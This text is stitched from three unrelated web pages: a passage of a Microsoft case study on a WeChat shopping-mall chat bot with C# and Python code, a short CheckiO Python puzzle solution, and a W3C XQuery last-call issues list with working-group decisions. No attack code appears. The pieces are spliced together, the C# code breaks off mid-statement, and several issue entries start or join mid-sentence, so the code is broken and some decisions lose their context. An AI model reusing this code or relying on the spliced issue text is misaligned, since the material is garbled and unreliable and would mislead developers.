if ("directline".Equals(activity.ChannelId)) { //微信使用的是DirectLine接入方式,调用api的时候可以将参数加在里面。本项目将微信的微信名作为参数到本地接收。 await Conversation.SendAsync(activity, () => new CRMDialog4WeChat(activity.From.Id)); } else { await Conversation.SendAsync(activity, () => new CRMDialog(activity.From.Id)); } } catch (Exception e) { ConnectorClient connector = new ConnectorClient(new Uri(activity.ServiceUrl)); // calculate something for us to return int length = (activity.Text ?? string.Empty).Length; // return our reply to the user Activity reply = activity.CreateReply($"You sent {activity.Text} which was {length} characters" + " error :" + e.ToString()); //await connector.Conversations.ReplyToActivityAsync(reply); } } else { //add code to handle errors, or non-messaging activities } return new HttpResponseMessage(System.Net.HttpStatusCode.Accepted); } } CRMInfo The CRMInfo class defines the data object that stores a user’s dialog info and the last recognized intent and entity from LUIS. 
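The WeChat-side relay that feeds messages into this controller is not shown in the case study. As a rough sketch of what such a relay does, the Python snippet below uses the public Direct Line 3.0 REST endpoints to start a conversation and post a user message, which the Bot Framework then delivers to MessagesController as a "directline" activity. The secret, user ID, and message text are placeholder values, not taken from the project.

import requests

DIRECT_LINE_SECRET = "YOUR_DIRECT_LINE_SECRET"  # placeholder; issued on the bot's Direct Line channel page
BASE = "https://directline.botframework.com/v3/directline"
headers = {"Authorization": "Bearer " + DIRECT_LINE_SECRET}

# Start a conversation for this WeChat user
conversation = requests.post(BASE + "/conversations", headers=headers).json()
conv_id = conversation["conversationId"]

# Forward the user's WeChat message to the bot as an activity;
# the "from" id is what arrives in activity.From.Id on the bot side
activity = {"type": "message", "from": {"id": "wechat-user-id"}, "text": "example question"}
requests.post(BASE + "/conversations/" + conv_id + "/activities", headers=headers, json=activity)

# Poll the bot's replies so they can be relayed back to the WeChat user
replies = requests.get(BASE + "/conversations/" + conv_id + "/activities", headers=headers).json()
print(replies["activities"])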
The reason why the bot does not use the intent and entity only for the current user input is that it needs to be context-aware. In some cases, one intent may last for several inputs. For example, the user question “Any recommendations for Thai food?” may easily be analyzed by LUIS with the intent “HaveMeal” and the entity “Thai food.” But when there follows “How about the Western food?”, LUIS may probably return no intent but the entity “Western food.” In this case, the last intent is referred to for the second input. public class CRMInfo { //顾客编号 public string customer { get; set; } //返回信息 public string replyString { get; set; } //目的 public string intent { get; set; } //品牌 public string brandText { get; set; } //业态 public string businessFormatText { get; set; } //楼层 public string floorText { get; set; } //单品 public string productText { get; set; } //基础信息 public string basicInfoText { get; set; } //活动 public string activityText { get; set; } //特约商户标志 private bool vipFlag = false; } CRMDialog4WeChat The CRMDialog4WeChat class handles intents and invokes the supporting services in CRMService4Wechat to assemble the bot’s reply message ( CRMInfo::replyString) to the user. Let’s take the QueryLocation intent as an example. When such an intent is passed from LUIS, it calls JudgeBrand1() to do a query for a certain brand. public class CRMDialog4WeChat { private CRMService4WeChat crmservice = new CRMService4WeChat(); //Intent: QueryLocation [LuisIntent("查询地点")] public async Task QueryLocation(IDialogContext context, LuisResult result) { //获取用户会话 CRMInfo info = crmservice.GetCustomerSession(TestCustomer); info.intent = "查询地点"; info.VipFlag = false; //设置通用信息 crmservice.SetCommonInfo(info, context, result); if (crmservice.JudgeBrand1(info)) { await context.PostAsync(info.replyString); //清空数据 crmservice.ClearData(info, false); } context.Wait(MessageReceived); } } CRMService4WeChat The bot’s dialog logic is expressed by the following functions: JudgeBrand1()in CRMService4WeChatis a dispatch function. - If there’s an effective brand entity string from LUIS, it calls JudgeBrand2()to assemble the reply for the brand’s location. - If the entity returned by LUIS is not a brand but a facility or landmark in the mall, it calls JudgeBasicInfo2(). In addition to providing the location information for a certain brand, the JudgeBrand2() function also: - Checks the category (or business format code) of this brand. - Tries to find related promotional information in the mall’s operations database (replaced by two hardcoded samples). - Replies to the user with quick hyperlinks. 
public class CRMService4WeChat { //判断品牌1 public bool JudgeBrand1(CRMInfo info) { //判断开始 if (!String.IsNullOrWhiteSpace(info.brandText)) { JudgeBrand2(info); } else if (!String.IsNullOrWhiteSpace(info.basicInfoText)) { JudgeBasicInfo2(info); } else { info.带我去</a>!"); sb.Append("<a href=\"星巴克&location=1\">优先排队</a>!"); sb.Append("<a href=\"\">领取优惠券</a>!"); sb.Append("\u0002"); sb.Append("现在星巴克有满100减20的活动,"); sb.Append("<a href=\"\">点我报名</a>可以折上折哦!"); sb.Append("\u0002"); sb.Append("您的优惠券:<a href=\"\">我的卡券</a>\n"); sb.Append("<a href=\"\">星巴克中杯咖啡券</a>\n"); sb.Append("<a href=\"\">星巴克买二送一</a>"); } else if ("小南国".Equals(BaseInfo.wordDic[brand.brand].name)) { sb.Append("\u0001小南国在这里"); sb.Append("\u0001点击查看小南国详情"); sb.Append("\u0001").Append(baseUrl).Append("/images/1F.png"); sb.Append("\u0001").Append(baseUrl).Append("/index2.html"); sb.Append("\u0001小南国品牌导购"); sb.Append("\u0001点击查看小南国详情"); sb.Append("\u0001").Append(baseUrl).Append("/images/xngdg.jpg"); sb.Append("\u0001"); sb.Append("\u0001小南国优惠券"); sb.Append("\u0001点击查看小南国详情"); sb.Append("\u0001").Append(baseUrl).Append("/images/xngyhq.jpg"); sb.Append("\u0001"); sb.Append("\u0001优先排队周末小南国满100减20,点我查看详总而言之言而总之,可以巴拉巴拉写很多很酷炫很吸引人的话放在这里,然后边上配上一张夺人眼球的图片!最多可以放8"); } break; } else if ("27".Equals(bb.businessformat_word_code) || "34".Equals(bb.businessformat_word_code)) { sb.Append("(可以接入虚拟试衣,领取优惠券等第三方服务)!"); break; } } info.replyString = sb.ToString(); } else { info.replyString = "对不起,您说的品牌" + info.brandText + "正大君没查询到哦。"; } return !String.IsNullOrWhiteSpace(info.replyString); } //判断基础信息2 public bool JudgeBasicInfo2(CRMInfo info) { //查询基础信息 t_basic_info basic_info = searchService.getBasicInfoByName(info.basicInfoText); if (null != basic_info) { StringBuilder sb = new StringBuilder(); sb.Append(basic_info.remark); info.replyString = sb.ToString(); } else { info.replyString = "对不起,您说的基础信息" + info.basicInfoText + "正大君没查询到哦。"; } return !String.IsNullOrWhiteSpace(info.replyString); } } Supporting functions, such as those as shown in the CRMService4WeChat code, process the intents and entities according to the dialog logic designed by the mall, and assemble and store the responses in the replyString in the CRMInfo object reference. The intent handling code in CRMDialog4WeChat posts the assembled replyString to the channel asynchronously, extending the intent handling entrances and the response generating functions until all the dialog logic is covered. Conclusion With Microsoft’s platform and partnership, Super Brand Mall in Shanghai published the first customer-facing chat bot for high-end shopping malls. Within only two months, the bot went from ideation to testing. The bot would bring more confidence to Super Brand Mall to engage its customers digitally and effectively. “With the help from Microsoft DX team, we have successfully trained an effective LUIS model and developed an intelligent chat bot that could answer most of the Frequently-Asked-Questions from our customers within such a short period. We really appreciate DX’s support. We are scheduling a launch of this bot in the coming months. We believe this bot would surely ignite our WeChat subscribers, provide amazing engagement experience and help us know our customers better.” —Christina Cheng, Director, IT Core Applications, Super Brand Mall Future work Many WeChat users prefer using voice rather than typing text. A chat bot that supports voice input would provide a better experience to these WeChat users. 
Using the Bing Speech API in Cognitive Services to do the speech recognition is definitely on top of Super Brand Mall’s to-do list. The conversations between the customers and the chat bot contain valuable data that the mall will never ignore. As one of the tasks on the list, customer preferences, interests, and activities would be extracted from the chat history and saved to Azure Storage for future machine learning and user profiling.
https://microsoft.github.io/techcasestudies/bot%20framework/2017/06/21/CaaP-SuperBrandMall.html
CC-MAIN-2021-39
en
refinedweb
Concise algorithm solution in Speedy category for Between Markers (simplified) by Igor_Sekretarev

def between_markers(text: str, begin: str, end: str) -> str:
    i = 0
    while text[i] != begin:
        i += 1
    j = len(text) - 1
    while text[j] != end:
        j -= 1
    return text[i+1:j]

if __name__ == '__main__':
    print('Example:')
    print(between_markers('What is >apple<', '>', '<'))

    # These "asserts" are used for self-checking and not for testing
    assert between_markers('What is >apple<', '>', '<') == "apple"
    assert between_markers('What is [apple]', '[', ']') == "apple"
    assert between_markers('What is ><', '>', '<') == ""
    assert between_markers('>apple<', '>', '<') == "apple"
    print('Wow, you are doing pretty good. Time to check it!')

April 23, 2021
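For comparison, the same scan-from-the-ends idea can be written with the built-in str.index and str.rindex methods. This is a sketch under the mission's guarantee that both markers are present; it is not part of the shared solution above, and the helper name is arbitrary:

def between_markers_short(text: str, begin: str, end: str) -> str:
    # index finds the first begin marker, rindex the last end marker,
    # mirroring the two while loops in the solution above
    return text[text.index(begin) + len(begin):text.rindex(end)]

assert between_markers_short('What is >apple<', '>', '<') == "apple"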
https://py.checkio.org/mission/between-markers-simplified/publications/Igor_Sekretarev/python-3/concise-algorithm/share/60c9af148a8421d7a90976c7b6e1d77b/
CC-MAIN-2021-39
en
refinedweb
Post Syndicated from Ben Nuttall original! Pin factories – take your pick GPIO Zero started out as a friendly API on top of the RPi.GPIO library, but later we extended it to allow other pin libraries to be used. The pigpio library is supported, and that includes the ability to remotely control GPIO pins over the network, or on a Pi Zero over USB. This also gave us the opportunity to create a “mock” pin factory, so that we could emulate the effect of pin changes without using real Raspberry Pi hardware. This is useful for prototyping without hardware, and for testing. Try it yourself! As well as the pin factories we provide with the library (RPi.GPIO, pigpio, RPIO, and native), it’s also possible to write your own. So far, I’m aware of only one custom pin factory, and that has been written by the AIY team at Google, who created their own pin factory for the pins on the AIY Vision Kit. This means that you can connect devices to these pins, and use GPIO Zero to program them, despite the fact they’re not connected to the Pi’s own pins. If you have lots of experience with RPi.GPIO, you might find this guide on migrating from RPi.GPIO to GPIO Zero handy. Ultrasonic distance sensor We had identified some issues with the results from the DistanceSensor class, and we dealt with them in two ways. Firstly, GPIO Zero co-author Dave Jones did some work under the hood of the pins API to use timing information provided by underlying drivers, so that timing events from pins will be considerably more accurate (see #655). Secondly, Dave found that RPi.GPIO would often miss edges during callbacks, which threw off the timing, so we now drop missed edges and get better accuracy as a result (see #719). The best DistanceSensor results come when using pigpio as your pin factory, so we recommend changing to this if you want more accuracy, especially if you’re using (or deploying to) a Pi 1 or Pi Zero. Connecting devices A really neat feature of GPIO Zero is the ability to connect devices together easily. One way to do this is to use callback functions: button.when_pressed = led.on button.when_released = led.off Another way is to set the source of one device to the values of another device: led.source = button.values In GPIO Zero v1.5, we’ve made connecting devices even easier. You can now use the following method to pair devices together: led.source = button Read more about this declarative style of programming in the source/values page in the docs. There are plenty of great examples of how you can create projects with these simple connections: Testing An important part of software development is automated testing. You write tests to check your code does what you want it to do, especially checking the edge cases. Then you write the code to implement the features you’ve written tests for. Then after every change you make, you run your old tests to make sure nothing got broken. We have tools for automating this (thanks pytest, tox, coverage, and Travis CI). But how do you test a GPIO library? Well, most of the GPIO parts of our test suite use the mock pins interface, so we can test our API works as intended, abstracted from how the pins behave. And while Travis CI only runs tests with mock pins, we also do real testing on Raspberry Pi: there are additional tests that ensure the pins do what they’re supposed to. See the docs chapter on development to learn more about this process, and try it for yourself. pinout You may remember that the last major GPIO Zero release introduced the pinout command line tool. 
We've added some new art for the Pi 3A+ and 3B+.

pinout also now supports the -x (or --xyz) option, which opens the website pinout.xyz in your web browser.

Zero boilerplate for hardware

The goal of all this is to remove obstacles to physical computing, and Rachel Rayns has designed a wonderful board that makes a great companion to GPIO Zero for people who are learning. Available from The Pi Hut, the PLAY board provides croc-clip connectors for four GPIO pins, GND, and 3V3, along with a set of compatible components. Since the board simply breaks out GPIO pins, there's no special software required. You can use Scratch or Python (or anything else).

New contributors

This release welcomed seven new contributors to the project, including Claire Pollard from PiBorg and ModMyPi, who provided implementations for TonalBuzzer, PumpkinPi, and the JamHat. We also passed 1000 commits!

Watch your tone

As part of the work Claire did to add support for the Jam HAT, she created a new class for working with its buzzer, which works by setting the PWM frequency to emit a particular tone. I took what Claire provided and added some maths to it, then Dave created a whole Tones module to provide a musical API. You can play buzzy jingles, or you can build a theremin:

GPIO Zero theremin

from gpiozero import TonalBuzzer, DistanceSensor

buzzer = TonalBuzzer(20)
ds = DistanceSensor(14, 26)

buzzer.source = ds

…or you can make a siren:

GPIO Zero TonalBuzzer sine wave

from gpiozero import TonalBuzzer
from gpiozero.tools import sin_values

buzzer = TonalBuzzer(20)

buzzer.source = sin_values()

The Tones API is a really neat way of creating particular buzzer sounds and chaining them together to make tunes, using a variety of musical notations:

>>> from gpiozero.tones import Tone
>>> Tone(440.0)
>>> Tone(69)
>>> Tone('A4')

We all make mistakes

One of the important things about writing a library to help beginners is knowing when to expect mistakes, and providing help when you can. For example, if a user mistypes an attribute or just gets it wrong – for example, if they type button.pressed = foo instead of button.when_pressed = foo – they wouldn't usually get an error; it would just set a new attribute. In GPIO Zero, though, we prevent new attributes from being created, so you'd get an error if you tried doing this. We provide an FAQ about this, and explain how to get around it if you really need to.

Similarly, it's common to see people type button.when_pressed = foo() and actually call the function, which isn't correct, and will usually have the effect of unsetting the callback (as the function returns None). Because this is valid, the user won't get an error to call their attention to the mistake. In this release, we've added a warning that you'll see if you set a callback to None when it was previously None. Hopefully that will be useful to people who make this mistake, helping them quickly notice and rectify it.

Update now

Update your Raspberry Pi now to get the latest and greatest GPIO Zero goodness in your (operating) system:

sudo apt update
sudo apt install python3-gpiozero python-gpiozero

Note: it's currently syncing with the Raspbian repo, so if it's not available for you yet, it will be soon.

What's next?

We have plenty more suggestions to be working on. This year we'll be working on SPI and I2C interfaces, including I2C expander chips. If you'd like to make more suggestions, or contribute yourself, find us over on GitHub.

The post GPIO Zero v1.5 is here! appeared first on Raspberry Pi.
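As a footnote to the pin factories section at the top of the post: the mock pin factory really can be tried with no Raspberry Pi hardware at all. Here is a minimal sketch; the pin numbers are arbitrary examples rather than anything from the post:

from time import sleep

from gpiozero import Device, LED, Button
from gpiozero.pins.mock import MockFactory

Device.pin_factory = MockFactory()  # emulate pins instead of driving real GPIO

led = LED(17)
button = Button(2)
led.source = button                 # new in 1.5: pass the device itself as the source

# Simulate a button press by driving the underlying mock pin low
# (Button uses a pull-up by default, so low means "pressed")
Device.pin_factory.pin(2).drive_low()
sleep(0.1)                          # give the source/values thread a moment to copy the value
print(led.value)                    # expected to report 1 while the simulated press is held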
https://noise.getoto.net/author/ben-nuttall/
CC-MAIN-2021-39
en
refinedweb
VLC module in Python – An Introduction

We can use the VLC media player with the help of Python as well. In order to install the vlc module in Python, use the command given below:

pip install python-vlc

Note: in order to use the vlc module in Python, VLC media player must already be installed on the machine.

Importing the VLC module: to import the VLC module, use the following:

import vlc

Fixing errors that may occur while importing the vlc module:

1. If the path is not added, the problem is that libvlc.dll is not in the PATH (system variable). Add the path of libvlc.dll to the system variable; the file can be found in the folder where VLC is installed.
2. Wrong version of VLC: people often download the 32-bit version of VLC, which may cause trouble if the 64-bit version of Python is installed. To fix that, reinstall the 64-bit version of VLC.
3. Import the os module prior to the vlc module and register libvlc.dll using os.add_dll_directory(r'C:\Program Files\VideoLAN\VLC').

Example 1: Playing a video using VLC (see the sketch below).

Example 2: Deriving the duration of a video file using the VLC module (see the sketch below).

Output:
Duration : 5006
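The two examples above are described here in prose only. The snippets below are a minimal sketch of how python-vlc is typically used for each task, not the article's original listings; "video.mp4" is a placeholder file name.

import time
import vlc

# Example 1 (sketch): play a video file.
player = vlc.MediaPlayer("video.mp4")
player.play()
time.sleep(10)                     # keep the script alive while playback runs
player.stop()

# Example 2 (sketch): report a video file's duration, which libvlc gives in milliseconds.
media = vlc.Media("video.mp4")
media.parse()                      # parse the file's metadata before asking for the duration
print("Duration :", media.get_duration())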
https://www.geeksforgeeks.org/vlc-module-in-python-an-introduction/
CC-MAIN-2021-39
en
refinedweb
Last call issues list for xquery (up to message 2004Mar/0246). This document identifies the status of Last Call issues on XQuery 1.0: An XML Query Language as of April 4, 2005. The XQuery 1.0 Language has been defined jointly by the XML Query Working Group and the XSL Working Group (both part of the XML Activity). As of the April 4, 2005 revision, the list covers 415 issue(s): 0 raised (0 substantive), 0 proposed, 415 decided, 0 announced and 0 acknowledged.

Section 3.1.5 Function Calls Editorial
Please reword: "parameteror" with "parameter or".
DECISION: To leave to the editor
RESOLVED: qt-2004Jan0029-01 closed, fixed editorially

Section 2.1.1 Static Context Editorial
"environmentor" => "environment or"
DECISION: To leave to the editor
RESOLVED: qt-2004Jan0152-01 closed, fixed editorially

Consider] Moved to the Data Model cluster.
Norm: the only resolution I can propose is, sometimes you lose. Use format-number if you care about precision. Section 3.4.1.1 ends with a paragraph mentioning that pattern facets are not respected during serialization (last paragraph in the section).
PC: how do we respond to the Schema WG comment?
Norm: we don't know how to address this. If you do this, your documents may not be valid after you manipulate the DM instance.
MRys: it's provable that you can't reverse the patterns.
RESOLVED: closed, Norm to reply with the "you lose" paraphrase.

The Web Service Description Language (WSDL) [1] provides a facility for describing Web services - a WSDL document could be thought of as an XML description of a set of function signatures. Some XML Query implementations will very likely support the idea of calling such functions in XPath expressions. Would it increase interoperability of such implementations if one could explicitly associate a namespace prefix with a WSDL document in the XML Query Prolog? For example, import service cvt at ""; and then, in the body of the query, one might be able to use cvt:convert("F", "C", 23.6) to convert between temperatures. An alternative to extending the prolog might be to extend access to an implementation's underlying URI resolver, so that users could implement WSDL support in XQuery directly. However, interoperability and integration between specifications is important to the W3C. Liam
[1] Web Services Description Language,
-- Liam Quin, W3C XML Activity Lead,
Status from meeting 201: PENDING. For looking up status of this, note mispelling. Paul suggested doing it using an external module which represents the web service via the module import feature.
RESOLUTION: No changes to the document. Respond to the comment that it can be done with import module or externally defined functions plus a layer of software which we do not need to define. Nothing is needed in the XQuery specification. Mike presented some issues illustrating that it cannot be done efficiently, which he will take to email.

This comment pertains to the 12 November 2003 internal WD of XQuery 1.0: An XML Query Language [1]. Please accept our sincere apologies on being past-due with this submission, which discharges the promise made in [2]. Regards, Henry S. Thompson (on behalf of the XML Schema WG)
-------------------------
There is what appears to us an inconsistency between section 3.13 Validate Expressions [1] (repeated in 3.7.1.5 Type of a Constructed Element) in XQuery itself and section 3.3 Construction from a PSVI [2] in the Data Model, based on the interpretation placed on the *validation mode*. The latter says: "The data model supports incompletely validated documents.
Elements and attributes that are not valid are treated as having unknown types." The former says: "If the [validity] property of the topmost element information item in this PSVI is not valid, a type error is raised." In concrete terms this means that starting from e.g. a document + schema where the document element is not declared, but one or more of whose descendants are declared, not only can a data model be constructed, but also it will have useful type information for those elements, since they will be [validity]='valid' and "If the [validity] property exists and is "valid", the type of an element or attribute information item is represented by an expanded-QName . . ." In contrast having constructed such a document node in a query context, the result of validating it will either be a type error (if *validation mode* is 'strict' or 'lax') or a tree with uniformly untyped data (if *validation mode* is 'skip'). This change in the interpretation of 'lax' from the one it is defined to have in XML Schema not only will confuse users, it is inconsistent with the way Data Model instances are constructed from PSVIs, and also means that undeclared elements are treated differently if they are at the validation root ('lax' has the new meaning) or internal to it ('lax' means what XML Schema says it means). We would very much hope that the power and flexibilty reflected in the detailed reporting of schema validity assessment outcome be available no only at Data Model construction time, but also via the 'validate' expression, by bringing the treatment of 'lax' as a *validation mode* in to line with XML Schema and Data Model construction. November draft of the XQuery specification (4.7 Module Import) says that "Two modules may import each other." However, the formal semantics assumes this is not the case, starting with: 5.2 Module Declaration ." So you say "let's fix the formal semantics". Doable, probably, but not trivially. The processing of the module prologue is done in "declaration order", and cyclic module imports disallows that. A module cycle has to be compiled as a unit; you can't separately compile them. So they're little more than syntactic sugar. I think you could define module cycles by defining module import as "semi-textually" merging in declarations from the imported module, renaming the namespace prefixes. I don't understand schema imports well enough to know if they would cause complications. Other declarations such as base-uri, validation declaration, and default collation declations probably cause minor complications. Variables declarations are the biggest obvious complication. Note that if a VarDecl omits the TypeDeclaration, the value of the VarRef is that of its definining expression. This doesn't work if there is a cycle between variables, so we'd need to add rules to disallows such a cycle. Note that XQuery static typing is strictly bottom-up; there is no ML-style type unification. A related issue is that the the formal semantics "looks up" variables and functions in imported modules by lookup up their namespace uri in the "module_dynEnv". Note this doesn't work if there are multiple modules in the same namespace. Both formal and informal semantics are very unclear about the difference between a library module as a syntactic unit, its namespace, and the result of elaborating one or more libray module syntax forms with the same uri. If there may be multiple modules for the same uri, how do you tell when there is a cycle? 
What if there is no location hint in the module import, or the location hint is an alias (e.g. a symbolic link) for a previously-imported module? Separate compilation becomes a lot more complicated, both definition and implementation, when modules may recursively import each other. Find a pre-compiled module is difficult unless there is a one-to-one mapping between modules and URIs. Location hints don't help much unless their meaning is standardized, at least in a non-normative manner. If two queries are executed, and both import the same library module, must/should the implementation evaluate the library module's variable initializations twice, or can it re-use the values from the first query? It is tempting to think of module-leval variables similar to C/C++/Java static variables that are initialized when their module is first loaded, but that may not be the desired semantics. Consider: declare variable $var { fn:current-time() }; I'm sure these issuees can be solved, but it will take time; better to leave them for version 2.0. Recommendation for XQuery 1.0: * Modules may not import each other, directly or indirectly. * Only allow a single library module for a given namespace. * Consider a non-normative recommendation that location specifiers in import statements be URIs (where relative URIs are resolved against the importing module's base uri, while defaults to its "source file name"). * Possibly: Remove the requirement that the fn:current-date, fn:current-time, and fn:current-dateTime functions if "invoked multiple times during the execution of a query or transformation, these functions always return the same result", since that would preclude an implementation from running library initializers only once. Alternative, recommended to be deferred to 2.0: * Allow modules to import each other, but prohibit static cycles in definition of variables. I.e. a variable's defining expression may not depend on variables or functions that in turn depend on it. This restriction should be statically checkable; this avoids the need for a dynamic check, and it solves the problem of determining the type of a variable without a type specifier. Note that a dynamic check for a cyclic dependency isn't enough if you're doing static typing. (I suggest allowing implementations without the static typing feature to defer the cycle check until runtime.) * We have to define both informally and formally the semantics of a cycle of module imports. This is difficult. * We have to be able to detect a module cycle. This means we have to have a concept of "module identity" or "module name". This is difficult if multiple modules may have the same namespace. * Remove the restriction that a variable must be defined before its use, as that is redundant, and the restriction is meaningless if you have modules that import from each other. -- --Per Bothner per@bothner.com ++ Jerome: Cyclic imports are hard to specify formally, and we should drop them in V1. ++ Jonathan: Agrees with Jerome. ++ DC: How exactly is cyclic import defined? ++ Jerome: The graph of modules importing other modules must not contain any closed cycles. We should not allow Module A to import Module B and Module B to import Module A. ++ Mike Carey: What is the problem with this? ++ Jerome: Interferes with separate compilation. We don't know where to start the compilation process. ++ Liam: Does anyone object to ruling out cyclic import in Version 1? 
++ Mike Carey: Yes, I'm concerned that if we rule this out for V1, we may somehow preclude introducing it in a later version. ++ Jonathan: But if cyclic import is an error in V1, relaxing this error in a later version would be a compatible change. ++ RESOLUTION: ++ Liam: I hear no objections other than from Mike Carey. I rule that Per Bothner's issue 2004Mar0013-01 is closed by accepting a restriction against cyclic modules in V1. Jerome will provide a proposed wording and Don will include it in the language document with editorial discretion. Jerome will reflect this decision in the Formal Semantics document. Mike Carey is encouraged to raise a separate issue if he discovers some way in which we are placing a limitation on Vnext. Closing this issue completes Action A-STATA-18. In XPath/XQuery Section 3.1.5, Function Calls, under "Function Conversion Rules", after atomization, we find the following rule: "Each item in the atomic sequence that is of type xdt:untypedAtomic is cast to the expected atomic type." This is not completely specified for certain built-in functions such as fn:abs() in which the expected parameter type is "numeric", which includes integer, decimal, float, and double. To complete the specification, we should insert the following sentence after the rule cited above: "For parameters of built-in functions where the expected type is specified as numeric, arguments of type xdt:untypedAtomic are cast to xs:double." --Don Chamberlin DECISION: qt-2004Feb1207-01 has been accepted by a previous decision and already implemented in the July 2004 draft.8 Section 3.13 Validate Expressions Validate expressions are defined in terms of serialization [3.13]. There are problems with interposing serialization between the data model and validation, however, and we suggest you return to using a mapping from the data model to the infoset and defining validation on that instead. Section [2.2.4] apparently relieves implementations of the necessity of supporting a serialization interface, but [3.13] requires it through the back door, and through a mechanism that does not provide the means to provide the serialization process with the normal serialization parameters. Serialization depends on casting to xs:string which in turn is defined in terms of the various type annotations on the data model. There is a certain apparent circularity here that is confusing, if nothing else. Interposing a serialization step means that validating a data model that already has type annotations may cause the validation outcome to be different, because the serialization rules are different, and some types are not necessarily serializable. In particular, serialization will fail for QName nodes with no bound prefix [ section 2]. There may also be edge cases involving simple derived types (in the schema being used for validation) with pattern restrictions that rule out certain of the serializations used for data already annotated with a certain types that would also lead to problems that would not have otherwise arisen. We suggest decoupling validate from serialization, and instead providing a mapping from the data model to the infoset and using that as the basis of validation. Providing such a mapping will help those who will inevitably have to create their own mappings, and to some extent mitigate the introduction of yet another data model. Moved to the Data Model cluster.6 Section 4.8 Variable Declaration The notion 'circular definitions' or 'circularity' is not well defined in the spec. 
The following wording provides a kind of definition: If an initializing expression cannot be evaluated because of a circularity (for example, it depends on a function that in turn depends on the value of the variable that is being initialized), a dynamic error is raised.[err:XQ0054]" It's not quite clear how circularity between modules is determined. For example, will the variable initialization be successful in case of such modules: module namespace math = ""; import module namespace math2 = ""; declare variable $x as xs:integer {$math2:z}; module namespace math2 = ""; import module namespace math = ""; declare variable $y as xs:integer {$math:x}; declare variable $z as xs:integer {1}; Jonathan will reply to Schema. Related issue: 2004Feb0791-01 This was closed at the MIT face to face.5 Section 3.12.3 Cast Needs to define a rule for determining static type of a cast expression. The type specified after the "as" word is expected to be the static type similar to the definition in "3.12.6 Treat" but the 3.12.3 section lacks such definition. RESOLVED: reject this comment. Jerome to reply that we will not make this change because the static type of an expression is defined in the Formal Semantics docuement, and cast is based on the dynamic4 Section 3.12.2 Typeswitch. There are no SequenceType components in the default clause according to the Grammar, so perhaps static type for variable should be defined in another way. Don: A typeswitch is equivalent to a stack of if-then-elses with treat in the then clauses. I think the commenter is correct that the case clauses have sequencetype, and the default clause does not. We should fix this. Jerome: The static type of the variable in the default clause is the same as the static type of the expression. Don suggests that we add that sentence to our document. RESOLVED: accept this comment, adding the sentence "The static type of the variable in the default clause is the same as the static type of the expression." Don to respond accordingly.2 Section 3.4 Arithmetic expressions The unary arithmetic operations are defined as: [65] UnaryExpr ::= ("-" | "+")* UnionExpr Allowing multiple unary operations to be concatenated together is different than normal practice in most other languages. A rationale or clarification would be welcomed here. See [432] [---+-+1, multiple unary operators before an expression, there for backward compatibility, group previously didn't want to change it] ACTION A-SJ04-27: Don will add a note to the XPath document to explain the rationale Range expressions (op:to) should treat empty sequence arguments in same way as other binary operators: if one of argument is empty sequence, result is empty sequence. I don't see reason for making exception for range expressions. Best Regards, Noe Michejda 7th Portal S.C. + DC: The current rule is consistent with the function conversion rules for integer. This is nice and simple. ++ M.Rys: Allowing empty sequences as operands of "to" would avoid static errors in some cases. ++ M.Kay: TO is unlike other binary operators because it takes singleton inputs and returns a sequence output. ++ Andrew: Advocates accepting the empty sequence in order to avoid error cases. ++ DECISION: Accepted last call comment qt-2004Feb/1141, subject to approval by XSL WG since it affects XPath. "TO" operator will accept empty sequences. ++Note from Chair: This decision was subsequently confirmed by the XSL WG. 
See: ++ DC: Accepting this comment requires: In section 3.3.1, under "range expression": Change the "expected parameter type" from "xs:integer" to "xs:integer?". Delete the following sentence. In the next sentence, insert "or if either operand is an empty sequence". No change is needed to operator mapping table or F&O. Current syntax of SequenceType gives user no control over allowing substitutions of element or not. User can't test for local element name if there is global declaration with same name without allowing of elements from substitution group of global element. Or element will be matched agains unanticipated type from global declaration, where user wanted only name test. And there will be no warning from processor. If schema is authored by another person than stylesheet or query this can lead to disaster if at some point declaration will be added without knowledge of stylesheet author. Using of declarations and substitution groups should be explicit. I propose following changes in syntax of elementTest to something like this: element() : matches any element element(*,type) : matches type if element type is 'type' or is derived from it element(qname ["decl" | "subst"] [,type] ["nillable"]) if "decl" is present, element is matched to global element declaration if "subst" is present, element is matched to global element declaration allowing substitutions if neither "decl" or "subst" is present element name is matched to 'qname' additionally if 'type' is present, element type must be derived from 'type' element(SchemaContextPath qname) element is matched to local element declaration same applies to attribute() [without 'subst'] This will remove synonyms: element() = element(*) = element(*,*) attribute() = attribute(*) = attribute(*,*) Another (maybe better to read) notation: element(decl(qname),type) element(subst(qname),type) or element(substitutions(qname),type) element(substitution(qname),type) attribute(decl(qname)) etc. Best Regards, Noe Michejda 7th Portal S.C. RESOLVED by current SequenceType syntax (reflected in July WD) ACTION: Jonathan to respond. SECTION 2.6: Optional Features Today XQuery requires node identities to be preserved in the language quite strongly. All nodes that are from an external source or created in the language require node identities to be preserved. This is a strict requirement that is not necessary for a large number of applications that need to deal only with the values contained in the nodes rather than the nodes' identity. This is also a great burden for implementations that can otherwise use streaming mechanisms for XML processing. This is also a problem for implementations that choose to push down the query to be evaluated in native systems like relational databases or other non-XML value based systems. Suggestion: Include a static context flag that specifies whether node identities need to be preserved. If the option is true, then no node based operations such as "is", "<<" , ">>" etc.. should be allowed. Further this could also restrict non-forward axes like parent(), sibling(), root(), etc.. - Steve B. MR sees proposal as requesting a single option in language that makes any expression that returns node, preserving node identity etc, would return copy of that node, with only subtree starting at that node, so every step in XPath expression would return new node rather than original. If duplicate elimination happens after that, nothing will ever get eliminated. See the use cases for this, but very reluctant to add it at this point. 
Think current proposal mixes ability to copy with ability to cut off the parent axis. Would prefer to handle that at the conformance level rather than munging data model. JR don't think it makes any sense to consider just what we are looking at on its own. If Oracle wants to present a complete proposal on what to change, we could consider it, but this isn't baked enough. SB: There is a more detailed proposal in the works. Would WG be interested in looking at it? Chair asks for sense of whether WG would be interested in a detailed proposal. Several members express unwillingness to consider such a magnitude change at this point. JM: Do we think this is something a vendor could add as a vendor extension and we could retrofit in a v-next? A: Sure. JM: We accept the WG's unwillingness but expect others will see this need and invite them to work with us on this, perhaps as a prelude v-next. RESOLVED: closed ORA-XQ-408-B with no action Dissent: Oracle SECTION 4.3: Base URI Does specifying the baseuri in a module only take effect for lexically defined URIs or does it also apply to any URI values present in the system? In particular does the xml:base property affect resolution of URLs inside a document? * When we convert an anyURI value from an element or an attribute to a string using the resolve-uri() function, does it take into account the xml:base property? e.g. consider a purchaseorder document with an xml:base property defined as "" and has an "attachment" element that is of the anyURI type. Now given a query like, declare {doc("boo")} </A> Does the URL "boo" inside doc() resolve as or ? - Steve B. Don identified text in the XQuery language spec, section 4.5. Andrew pointed us to section 15.5.4, fn:doc(), in the F&O spec. Between the two, the meeting concluded that the base URI declared in the module prolog is used to 